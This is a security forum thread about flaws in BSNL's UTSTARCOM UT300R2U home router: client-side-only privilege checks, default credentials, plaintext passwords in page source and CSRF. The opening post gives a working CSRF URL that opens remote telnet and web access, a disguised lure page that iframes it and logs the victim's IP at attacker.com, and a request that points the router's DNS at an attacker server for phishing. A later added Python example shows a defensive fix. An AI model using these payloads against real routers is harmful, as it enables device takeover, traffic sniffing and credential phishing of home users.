
Thread: BSNL Home Routers - UTSTARCOM [UT300R2U]

  1. #1

    BSNL Home Routers - UTSTARCOM [UT300R2U]

    Hello mates, this is my first post here.

    Today I'm going to show you how a series of vulnerabilities in a web application could be creatively exploited.

    Product Description:
    The product I had my hands on is this UTSTARCOM router.

    It is one of the most common ADSL modem-cum-routers, rolled out by BSNL to their customers a year ago, when the number of internet subscribers was reaching its peak. This little device runs a webserver which serves the web-based router configuration application. Further, it has a Telnet service running on it.

    The So-Called Built-In Security Features:

    * Remote web access to the router is blocked by default [so you can't access a victim's router using his public IP]
    * Remote Telnet access is also blocked

    After a little play around with the device, I've found that there are 3 different users that can log in to the router,
    viz. admin, user, support.

    The documentation provided by BSNL neither states that there are 3 different users that could access the device, nor forces/asks/shows the users to change their default password for accessing the router [Note: I'm not talking about the PPPoE password].

    http://www.chennai.bsnl.co.in/BBS/UT300R2U.htm

    User Description:
    As the name suggests, the admin user has the ability to make all configuration changes to the router, whereas the user-privileged user cannot make any changes to the configuration of the router.

    Logged in as Admin:


    Logged in as User:


    Vulnerability Description:

    On a closer examination of the source code, I got hold of a JavaScript file, menuBCM.js:


    Code:
    menuBCM.js: 
      
      function menuAdmin(options) { // All the options are displayed for ADMIN
       var std = options[MENU_OPTION_STANDARD];
       var proto = options[MENU_OPTION_PROTOCOL];
       var firewall = options[MENU_OPTION_FIREWALL];
       var nat = options[MENU_OPTION_NAT];
       var ipExt = options[MENU_OPTION_IP_EXTENSION];
       var wireless = options[MENU_OPTION_WIRELESS];
       var voice = options[MENU_OPTION_VOICE];
       var snmp = options[MENU_OPTION_SNMP];
       var ddnsd = options[MENU_OPTION_DDNSD];
       var sntp = options[MENU_OPTION_SNTP];
    .
    .
    if ( user == 'admin' ) //this piece of code calls the respective menu to be displayed
          menuAdmin(options);
       else if ( user == 'support' )
          menuSupport(options);
       else if ( user == 'user' )
          menuUser();
    }
    -------------code truncated
    So it is pretty obvious from the code that user privilege management is handled by this JavaScript, by displaying all menus to admin and hiding the configuration menus from the user.

    So it is possible for a user to navigate to the configuration pages if he knows the URL.

    The default username password combination is
    admin:admin
    user:user

    Since we know that user privilege management is handled by JavaScript, it has nothing to do with a telnet session, so when we telnet in as either admin or user, we get full access [privilege] to the router.

    Further adding fuel to the fire, CSRF is present in the web-based configuration application.

    Exploiting Methods:

    First and foremost, we can't access the victim's router from the WAN.

    As a CSRF vulnerability is present on the router, this script will do the job:

    Code:
    http://user:user@192.168.1.1/scsrvcntr.cmd?action=save&http=1&http=3&icmp=1&snmp=1&snmp=3&telnet=1&telnet=3&tftp=2&tftp=0
    Since the user:user account is some sort of hidden/undisclosed account, the possibility of its default password having been changed is very low.

    We could send this link to a victim either in an email or by some SE techniques. What this does is change the router configuration to allow remote web access and remote telnet access on the router.

    The entire exploit looks like this:

    Code:
    index.html
    
    <html>
    <head>
    <title>SpeedItUp</title>
    </head>
    <body>
    <br><h1>This page configures your system to use high speed internet, please wait for
    few seconds for the script to configure</h1></br>
    Please click the button to continue.
    <iframe src ="config.html" width=70 marginwidth="25%" height=20
    scrolling="no" frameborder="0" class="iframe"></iframe>
    </body>
    </html>
    config.html

    Code:
    <html>
    <body onload="window.scrollTo(1440, 980);">
    <iframe src="http://user:user@192.168.1.1/scsrvcntr.cmd?action=save&http=1&http=3&icmp=1&snmp=1&snmp=3&telnet=1&telnet=3&tftp=2&tftp=0"
    width=3000 height=1000 frameborder=0></iframe>
    <iframe src="http://attacker.com/ip.php"
    width=3000 height=1000 frameborder=0></iframe>
    </body>
    </html>
    So after the user visits this page, we will have his IP in our database or somewhere, depending upon the IP logger script.
    Now we can log in to his router either by telnetting or by logging in to the web application.

    Even if the victim changes the admin password for the device, we could log in as user:user, navigate to the password.html page and view the source -- Kaboom, plaintext passwords in JavaScript.

    Code:
    Source code of password.html
    
    <script language="javascript">
    <!-- hide

      pwdAdmin = 'lame';  // Passwords for all users are passed in plaintext for comparing
      pwdSupport = 'support';
      pwdUser = 'user';
      function btnApply() {
        var loc = 'password.cgi?';
        with ( document.forms[0] ) {
          var idx = userName.selectedIndex;

          switch ( idx ) {
            case 0:
              alert("No username is selected.");
              return;
            case 1:
              if ( pwdOld.value == pwdAdmin )
                break;
              else {
                alert("Old admin password is wrong.");
                return;
              }
            case 2:
              if ( pwdOld.value == pwdSupport )
                break;
              else {
                alert("Old support password is wrong.");
    -------------------------- truncated
    So now we have admin access on both the TELNET service and the web service. Now here comes a variety of exploitation techniques.


    Possible Attacks:

    1. Denial of Service:

    1. The attacker might implement MAC filtering or other IP restrictions on the victim's router.
    2. Specifying an unreachable static route.
    3. Killing the httpd server process of the router repeatedly by telnetting into the victim's router.

    2. Sniffing:

    1. The attacker could specify a static route passing through his network for the victim's router and sniff the traffic from the victim. [SSL Strip + Ettercap + Wireshark]


    3. Phishing:

    This is the attack of our special interest, as it is one of the stealthiest attacks when combined with routing attacks.
    The attacker could specify a fake DNS server for the victim's router and carry out phishing attacks.
    Code:
    http://192.168.1.1/dnscfg.cgi?dnsPrimary=XX.XX.XX.XX&dnsSecondary=XX.XX.XX.XX&dnsDynamic=0&dnsRefresh=1
    XX.XX.XX.XX = Attacker's DNS server

    This changes the primary & secondary DNS servers of the victim's router.

    Now the victim's network looks like this:



    So we can specify our phishing site's IP address as A records for famous websites like Facebook, Orkut, banking sites etc. in our DNS server.



    You can download the whitepaper here.
    Peace.. A similar vulnerability is found in Nokia-Siemens and many other home routers.
    Fairly long post, isn't it?
    Comments and suggestions are welcomed.
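    The post above describes three weaknesses that all share one root cause: the device trusts what the browser shows or sends (menus hidden by menuBCM.js, configuration CGIs reachable by any authenticated session or by a cross-site GET, and password.html carrying the plaintext passwords for the client-side check). The following is an added example, not code from the original post nor from the UTSTARCOM/BSNL firmware, written in Python to show the server-side shape that closes all three: a per-endpoint role table, a POST-only rule with Origin and CSRF-token checks, and a password-change handler that verifies the old password against a salted hash on the server. The endpoint paths, the 192.168.1.1 address, the user names and attacker.com come from the post; the parameter names remote_http, remote_telnet, csrf and pwdNew, the Session and Router classes and the allowed-origin set are assumptions made for the illustration.

```python
import hashlib
import hmac
import os
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs

# Roles allowed to call each state-changing endpoint. In the thread this
# decision lives only in menuBCM.js (menu hiding); here the server enforces it.
ENDPOINT_ROLES = {
    "/scsrvcntr.cmd": {"admin"},                    # remote http/telnet control
    "/dnscfg.cgi": {"admin"},                       # DNS server settings
    "/password.cgi": {"admin", "support", "user"},  # own-password change
}
# Origin the UI is served from (assumed); a page on attacker.com never matches.
ALLOWED_ORIGINS = {"http://192.168.1.1"}


def hash_password(password, salt=None):
    """Salted PBKDF2 digest: the only form in which a password is stored."""
    salt = os.urandom(16) if salt is None else salt
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def verify_password(password, stored):
    """Constant-time comparison against the stored (salt, digest) pair."""
    salt, digest = stored
    return hmac.compare_digest(hash_password(password, salt)[1], digest)


@dataclass
class Session:
    user: str
    role: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Router:
    """In-memory stand-in for the device configuration (assumed, for the demo)."""
    creds: dict                      # user -> (salt, digest)
    remote_http: bool = False
    remote_telnet: bool = False
    dns: tuple = ("", "")


def handle(router, session, method, path, origin, body):
    """Process one request and return (status, message). Checks run in order:
    method, Origin, CSRF token, role, then endpoint validation. None of them
    depends on what the browser displayed, so a hidden menu changes nothing."""
    if method != "POST":
        return 405, "state changes require POST"  # an <iframe src=...> GET stops here
    if origin not in ALLOWED_ORIGINS:
        return 403, "cross-origin request rejected"
    params = {k: v[-1] for k, v in parse_qs(body).items()}
    token = params.get("csrf", "")
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return 403, "missing or wrong CSRF token"
    if session.role not in ENDPOINT_ROLES.get(path, set()):
        return 403, "role %r may not use %s" % (session.role, path)

    if path == "/scsrvcntr.cmd":
        # Parameter names are assumed; the thread's query string uses others.
        router.remote_http = params.get("remote_http") == "on"
        router.remote_telnet = params.get("remote_telnet") == "on"
        return 200, "service access updated"
    if path == "/dnscfg.cgi":
        router.dns = (params.get("dnsPrimary", ""), params.get("dnsSecondary", ""))
        return 200, "dns updated"
    if path == "/password.cgi":
        # A session changes only its own password; the old one is verified
        # here against the hash and is never written into any HTML page.
        if not verify_password(params.get("pwdOld", ""), router.creds[session.user]):
            return 403, "old password is wrong"
        new = params.get("pwdNew", "")
        if len(new) < 8 or new == params.get("pwdOld"):
            return 400, "new password too short or unchanged"
        router.creds[session.user] = hash_password(new)
        return 200, "password changed"
    return 404, "unknown endpoint"


def demo():
    """Replay the thread's request shapes (constructed) against the handler."""
    router = Router(creds={u: hash_password(u) for u in ("admin", "support", "user")})
    user, admin = Session("user", "user"), Session("admin", "admin")
    lan, foreign = "http://192.168.1.1", "http://attacker.com"
    requests = [
        (user, "GET", "/scsrvcntr.cmd", foreign, "remote_http=on"),  # iframe-style GET
        (user, "POST", "/scsrvcntr.cmd", foreign, "remote_http=on&csrf=" + user.csrf_token),
        (user, "POST", "/scsrvcntr.cmd", lan, "remote_http=on&csrf=" + user.csrf_token),
        (admin, "POST", "/scsrvcntr.cmd", lan, "remote_http=on&csrf=" + admin.csrf_token),
        (user, "POST", "/password.cgi", lan, "pwdOld=wrong&pwdNew=longenough1&csrf=" + user.csrf_token),
        (user, "POST", "/password.cgi", lan, "pwdOld=user&pwdNew=longenough1&csrf=" + user.csrf_token),
    ]
    statuses = [handle(router, *r)[0] for r in requests]
    return router, statuses  # statuses: [405, 403, 403, 200, 403, 200]
```

    Calling demo() walks the six request shapes in order: the cross-site GET is refused before any credential is looked at, the same request as a cross-origin POST fails the Origin check, a user-role session with a valid token still cannot touch the service-control endpoint, and only the admin session with its own token flips the remote-access flag. The telnet side of the post has the same answer in principle: the role has to be enforced by the service that executes the command, not by whichever client happens to render a menu.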

  2. #2
    AnArKI (Infosec Enthusiast):
    That's an impressive post.

  3. #3
    fb1h2s (Security Researcher):
    Great post, loved it. Even I used to think about what the possibility or extent of a router/modem default password hack could lead to; well, that DNS stuff is the perfect one: faking the DNS server, look for the kind of pages the victim requests and then build the DNS server accordingly.


    Please post cool stuff like this, thanks.
    Hacking Is a Matter of Time Knowledge and Patience

  4. #4
    AnArKI (Infosec Enthusiast):
    Perfect example of CSRF (Cross-Site Request Forgery)....

  5. #5
    b0nd (... I am no Expert):
    Yeah that's a kewl attack scenario Boris.
    TFS your research.
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  6. #6
    nice read, thank you

  7. #7

    Also try this and do a little research:

    tn3270://ipaddr

    Some research is needed on the above protocol handler. It exists on Windows XP systems, and an attacker can force a victim to open a telnet connection to any arbitrary port.

    ..."vinnu"

  8. #8
    the_empty (InfoSec Consultant):
    Awesome work Boris.. TFS
    ACCESS is GOD

  9. #9


    Cool Find! Cheer!

  10. #10
    Great Research ...thanks
    The three great essentials to achieve anything worth while are: Hard work, Stick-to-itiveness, and Common sense. - Thomas A. Edison